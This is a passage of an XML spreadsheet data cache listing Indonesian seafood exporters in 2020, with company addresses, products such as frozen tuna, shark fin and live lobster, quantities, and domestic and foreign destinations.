    <s v="Kota Medan, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19744"/>
    <x v="25"/>
    <s v="PT. CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19745"/>
    <x v="25"/>
    <s v="PT. CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20450"/>
    <x v="26"/>
    <s v="PT. ANEKA TUNA INDONESIA"/>
    <s v="Jl. Raya Gunung Gangsir RT 007 RW 009, Kel. Nogosari, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-04-24T00:00:00"/>
    <n v="18080000"/>
    <m/>
    <s v="American Samoa, Australia, Canada, Egypt, Libya, Papua New Guinea, Qatar, Saudi Arabia, United States, Uzbekistan"/>
  </r>
  <r>
    <n v="17157"/>
    <x v="27"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT MAYANGAN"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kabupaten Lamongan, Kota Surabaya"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Malaysia, Oman, Philippines, Sri Lanka, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20044"/>
    <x v="28"/>
    <s v="PT, INDUSTRI PERIKANAN TERPADU CHIU SHIH"/>
    <s v="Jl, Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-11T00:00:00"/>
    <n v="320823"/>
    <s v="Kota Jakarta Utara, Kabupaten Cilacap, Kabupaten Tegal, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="20045"/>
    <x v="28"/>
    <s v="PT, INDUSTRI PERIKANAN TERPADU CHIU SHIH"/>
    <s v="Jl, Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Barakuda, Lemadang, Marlin, Gindara, Layaran, Tenggiri, Todak)"/>
    <d v="2020-06-11T00:00:00"/>
    <n v="461835"/>
    <s v="Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang, Kota Tegal, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="20046"/>
    <x v="28"/>
    <s v="PT, INDUSTRI PERIKANAN TERPADU CHIU SHIH"/>
    <s v="Jl, Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Sirip Hiu Beku"/>
    <d v="2020-06-11T00:00:00"/>
    <n v="62778"/>
    <s v="Kota Jakarta Utara, Kota Semarang, Kota Tegal, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="20043"/>
    <x v="28"/>
    <s v="PT. INDUSTRI PERIKANAN TERPADU CHIU SHIH"/>
    <s v="Jl. Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-06-11T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kabupaten Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19435"/>
    <x v="29"/>
    <s v="PT. MARITIM NUSANTARA PERKASA"/>
    <s v="Kawasan Pelabuhan Perikanan Nizam Zachman Jl. Muara Baru Ujung Blok T No.8 RT 020 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Beku"/>
    <d v="2020-03-12T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19854"/>
    <x v="30"/>
    <s v="CV. AYBI"/>
    <s v="Jl. T. Samidan Lr. Usman Muhammad No.4A, Kel. Lamglumpang, Kec. Ulee Kareng, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="India, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="19855"/>
    <x v="30"/>
    <s v="CV. AYBI"/>
    <s v="Jl. T. Samidan Lr. Usman Muhammad No.4A, Kel. Lamglumpang, Kec. Ulee Kareng, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Lobster Hidup"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="India, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="19858"/>
    <x v="30"/>
    <s v="CV. AYBI"/>
    <s v="Jl. T. Samidan Lr. Usman Muhammad No.4A, Kel. Lamglumpang, Kec. Ulee Kareng, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Udang Segar"/>
    <d v="2020-02-26T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="India, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="20783"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tuna Rebus Beku"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="276000"/>
    <m/>
    <s v="Canada, China, Korea, Republic of, Norway, Singapore, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20784"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Rebus Beku"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="260000"/>
    <m/>
    <s v="Canada, China, Korea, Republic of, Norway, Singapore, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20785"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Rebus Beku"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="245000"/>
    <m/>
    <s v="Canada, China, Korea, Republic of, Norway, Singapore, Thailand, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20739"/>
    <x v="8"/>
    <s v="PT. CENHONG FISHERINDO"/>
    <s v="Pelabuhan Perikanan Samudera Nizam Zachman Jl. Muara Baru Ujung Blok L No.3 Room 4 dan 5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Deho, Kembung, Lemadang, Meka, Gindara, Muroaji, Layaran, Layang, Cakalang, Tenggiri, Salem)"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="6757720"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <s v="Japan, Korea, Democratic People's Republic of, South Africa, Suriname, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19740"/>
    <x v="25"/>
    <s v="PT, CAHAYA BAHARI JAKARTA"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl, Pendaratan Ikan No,04 RT 005 RW 003, Kel, Pluit, Kec, Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Lemuru, Tongkol, Deho, Kembung, Lemadang, Marlin, Salem, Muroaji, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kabupaten Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19693"/>
    <x v="24"/>
    <s v="PT. GABUNGAN SAMUDERA INTERNASIONAL"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-03-13T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Jakarta Utara, Kabupaten Bandung, Kota Bogor, Kota Semarang, Kota Surabaya, Kota Denpasar"/>
    <s v="Japan, Korea, Democratic People's Republic of, Philippines, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="19408"/>
    <x v="32"/>
    <s v="CV. INDOTROPIC FISHERY"/>
    <s v="Jl. Raya Km 9, Kel. Biak, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="1217190"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Greece, Hong Kong, Japan, Malta, Mexico, Panama, Slovenia, Spain, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19853"/>
    <x v="33"/>
    <s v="PT. KENT HASIL LAUT"/>
    <s v="Jl. Peternakan 2 Blok C9 No.24B RT 006 RW 007, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <s v="Korea, Democratic People's Republic of, Korea, Republic of, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19859"/>
    <x v="33"/>
    <s v="PT. KENT HASIL LAUT"/>
    <s v="Jl. Peternakan 2 Blok C9 No.24B RT 006 RW 007, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Terbang, Kembung, Lemadang, Marlin, Meka, Gindara, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <s v="Korea, Democratic People's Republic of, Korea, Republic of, Singapore, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21358"/>
    <x v="34"/>
    <s v="PT. MULTI MINA PERSADA"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Gulama, Senangin, Manyung, Layur, Kakap Merah)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kabupaten Tangerang"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19839"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Kering (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-11T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Bandung"/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="19673"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kering"/>
    <d v="2020-02-06T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20008"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20009"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20010"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20011"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Air Tawar Hidup (Nila, Lele, Gurame, Patin, Mas, Betutu)"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20012"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Air Tawar Hidup"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="20013"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Belut Hidup"/>
    <d v="2020-05-27T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="21359"/>
    <x v="34"/>
    <s v="PT. MULTI MINA PERSADA"/>
    <s v="Taman Pergudangan dan Perkantoran Muara Baru Blok C5-C6, Jl. Muara Baru Raya No. 30, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Barakuda, Deho, Kembung, Layang, Cakalang, Tenggiri, Salem)"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Karawang, Kabupaten Bekasi, Kabupaten Tangerang"/>
    <s v="China, Korea, Democratic People's Republic of, Sri Lanka, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="20487"/>
    <x v="22"/>
    <s v="CV. JALADRI INDONESIA"/>
    <s v="Jl. Kawasan Wisata Tanjung Bayang RT 04 RW 05, Kel. Tanjung Medeka, Kec. Tamalate, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Katamba, Manyung, Kerapu, Layur, Bawal, Kakap, Barramundi)"/>
    <d v="2020-04-30T00:00:00"/>
    <n v="84000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="20195"/>
    <x v="36"/>
    <s v="PT. BAHARI BIRU NUSANTARA"/>
    <s v="Jl. Daendels Km 82.6 No.88, Desa Sedayulawas, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Cobia, Lemadang, Layang, Tenggiri)"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Malaysia, United Arab Emirates, United States, Viet Nam"/>
  </r>
  <r>
    <n v="21276"/>
    <x v="37"/>
    <s v="PT. LAUTAN MUTIARA JAYA"/>
    <s v="Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Lobster Hidup"/>
    <d v="2020-10-12T00:00:00"/>
    <n v="27000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Hong Kong, Japan, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand"/>
  </r>
  <r>
    <n v="19653"/>
    <x v="38"/>
    <s v="CV. JAYA SEAFOOD"/>
    <s v="Jl. Syiah Kuala, Kel. Lamdingin, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Pelagis Segar (Lemadang, Marlin, Meka, Tenggiri)"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="19654"/>
    <x v="38"/>
    <s v="CV. JAYA SEAFOOD"/>
    <s v="Jl. Syiah Kuala, Kel. Lamdingin, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Segar (Lencam, Senangin, Kerapu, Layur, Jenaha, Kakatua, Bawal, Kakap)"/>
    <d v="2020-02-07T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates, United States"/>
  </r>
  <r>
    <n v="17156"/>
    <x v="27"/>
    <s v="PERUM PERIKANAN INDONESIA UNIT MAYANGAN"/>
    <s v="Komplek Pelabuhan Perikanan Pantai Mayangan, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Tegal, Kabupaten Lamongan, Kota Surabaya, Kota Tangerang"/>
    <s v="China, Japan, Korea, Democratic People's Republic of, Philippines, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20715"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Belut Beku"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Tangerang"/>
    <s v="China, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="19404"/>
    <x v="40"/>
    <s v="PT, INDU MANIS"/>
    <s v="Kawasan Industri Gresik Kav G-1, Kel, Randuagung, Kec, Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-04-17T00:00:00"/>
    <n v="649877.69999999995"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19405"/>
    <x v="40"/>
    <s v="PT, INDU MANIS"/>
    <s v="Kawasan Industri Gresik Kav G-1, Kel, Randuagung, Kec, Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-04-17T00:00:00"/>
    <n v="598815.55000000005"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="19406"/>
    <x v="40"/>
    <s v="PT. INDU MANIS"/>
    <s v="Kawasan Industri Gresik Kav G-1, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-05-29T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="Canada, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20344"/>
    <x v="41"/>
    <s v="CV. BUANA LAUT NUSANTARA"/>
    <s v="Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="Australia, China, Korea, Republic of, Taiwan, Province of China, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20716"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Lobster Beku"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang"/>
    <s v="Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="16855"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16856"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16857"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik, Lemuru, Tongkol, Capelin, Kembung, Lemadang, Gindara, Salem, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16858"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Makerel Atlantik, Lemuru, Tongkol, Capelin, Kembung, Lemadang, Gindara, Salem, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <s v="China, Hong Kong, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="16859"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal, Malong, Gulama, Lencam, Manyung, Kuwe, Kerapu, Layur, Kakatua, Kakap, Ayam-ayam, Kuro, Ekor Kuning)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
